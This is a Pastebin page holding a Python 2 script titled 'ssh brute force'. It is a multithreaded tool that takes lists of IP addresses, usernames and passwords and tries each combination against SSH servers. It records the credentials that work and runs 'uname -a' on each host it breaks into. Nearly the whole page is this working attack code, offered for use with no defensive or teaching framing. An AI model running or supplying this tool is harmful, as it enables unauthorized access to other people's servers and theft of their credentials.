Advertisement
Gentoo7

ssh brute force

Oct 14th, 2016
28,781
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.73 KB | None | 0 0
  1. import paramiko, sys, Queue, threading
  2.  
  3. class SSHBrute(threading.Thread):
  4.     def __init__(self, queue):
  5.         threading.Thread.__init__(self)
  6.         self.queue = queue     
  7.     def run(self):
  8.         while True:
  9.             ip,user,passwd = self.queue.get()
  10.             self.kraken(ip,user,passwd)
  11.             self.queue.task_done()
  12.            
  13.     def kraken(self,ip,user,passwd):
  14.         try:
  15.             if ip in cracked: return False
  16.            
  17.             if '%user%' in str(passwd):
  18.                 passwd = passwd.split("%")[0] + user + passwd.split("%")[2]
  19.             if '%User%' in str(passwd):
  20.                 pwd = user + passwd.split("%")[2]
  21.                 passwd = passwd.split("%")[0]+pwd.title()
  22.             if str(passwd) == '%null%':
  23.                 passwd = ''
  24.            
  25.             ssh = paramiko.SSHClient()
  26.             ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  27.             ssh.connect(ip, username=user, password=passwd, timeout=35)
  28.             raw.write(ip+' '+user+' '+passwd+'\n')
  29.             raw.flush()
  30.             chan = ssh.get_transport().open_session()
  31.             chan.settimeout(35)
  32.             chan.exec_command('uname -a')
  33.             data = chan.recv(1024)
  34.            
  35.             if len(data) == 0:
  36.                 nologs.write(ip+' '+user+' '+passwd+'\n')
  37.                 nologs.flush()
  38.                 return False
  39.                
  40.             val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n')
  41.             val.flush()
  42.             cracked.append(ip)
  43.             chan.close()
  44.             ssh.close()
  45.             return True
  46.         except Exception, e:
  47.             if 'uthent' in str(e):
  48.                 if dbg == 'bad':
  49.                     bad.write(ip+'\n')
  50.                     bad.flush()
  51.                 #print '\r[+]Tried '+ip+' '+user+' '+passwd+'               '
  52.                 ssh.close()
  53.                 return False
  54.             #print ip, str(e)
  55.             ssh.close()
  56.             return False
  57.            
  58. def brutemain():
  59.     if len(sys.argv) < 2:
  60.         print """
  61.     Usage:
  62.        bruter ThreadNumber IpFile UserFile PassFile FilterSwitch*  
  63.       *The filter Switch Takes Either the word "bad" or "no".
  64.        If you supply the word bad, it filters in bad.txt only the ips
  65.        which indeed support ssh AUTH and password didn't work"""
  66.         return False
  67.     ThreadNR = int(sys.argv[1])
  68.     queue = Queue.Queue(maxsize=20000)
  69.     try:
  70.         i = 0
  71.         for i in range(ThreadNR):
  72.             t = SSHBrute(queue)
  73.             t.daemon = True
  74.             t.start()
  75.             i += 1
  76.     except Exception, e:
  77.         print 'Cant start more than',i,'Threads!'
  78.        
  79.     global bad
  80.     global val
  81.     global nologs
  82.     global cracked
  83.     global raw
  84.     cracked = []
  85.     bad = open('bad.txt','w')
  86.     val = open('valid.txt','a')
  87.     nologs = open('nologins.txt','a')
  88.     raw = open('raw.txt','a')
  89.     with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines()
  90.     with open(str(sys.argv[3]),'rU') as uf: users = uf.read().splitlines()
  91.     with open(str(sys.argv[4]),'rU') as pf: passwords = pf.read().splitlines()
  92.     global dbg
  93.     dbg = str(sys.argv[5])
  94.    
  95.     try:
  96.         for password in passwords:
  97.             for user in users:
  98.                 for ip in ips:
  99.                     queue.put((ip,user,password))
  100.     except:
  101.         pass
  102.        
  103.     queue.join()
  104.  
  105. if __name__ == "__main__":
  106.     brutemain()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement